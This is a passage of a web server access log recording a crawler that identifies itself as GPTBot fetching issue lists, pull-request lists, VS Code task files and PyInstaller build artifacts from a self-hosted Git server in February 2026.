74.7.227.38] [Length 31637] [Gzip 13.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" +[17/Feb/2026:19:37:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:37:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9972] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:37:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:37:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:37:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:37:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:37:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:37:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12024] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12023] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12024] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12025] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12028] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12024] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12023] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:37:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 38854] [Gzip 14.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:19:37:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 11127] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +[17/Feb/2026:19:37:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11179] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:19:37:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 71449] [Gzip 17.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:19:37:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11178] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:19:37:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11180] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:19:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11180] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:19:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 11126] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +[17/Feb/2026:19:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11179] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:19:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11180] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:19:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11177] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:19:37:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 71137] [Gzip 17.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:19:37:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 72324] [Gzip 17.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:19:37:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 71088] [Gzip 17.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:19:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 72159] [Gzip 17.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:19:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11177] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:19:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11179] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:19:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 37285] [Gzip 14.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:19:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 72281] [Gzip 17.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:19:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 38854] [Gzip 14.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:19:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 11126] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +[17/Feb/2026:19:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=latest&state=closed&type=all" +[17/Feb/2026:19:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:19:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:38:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:38:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:38:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:38:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=oldest&state=closed&type=all" +[17/Feb/2026:19:38:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=closed&type=all" +[17/Feb/2026:19:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 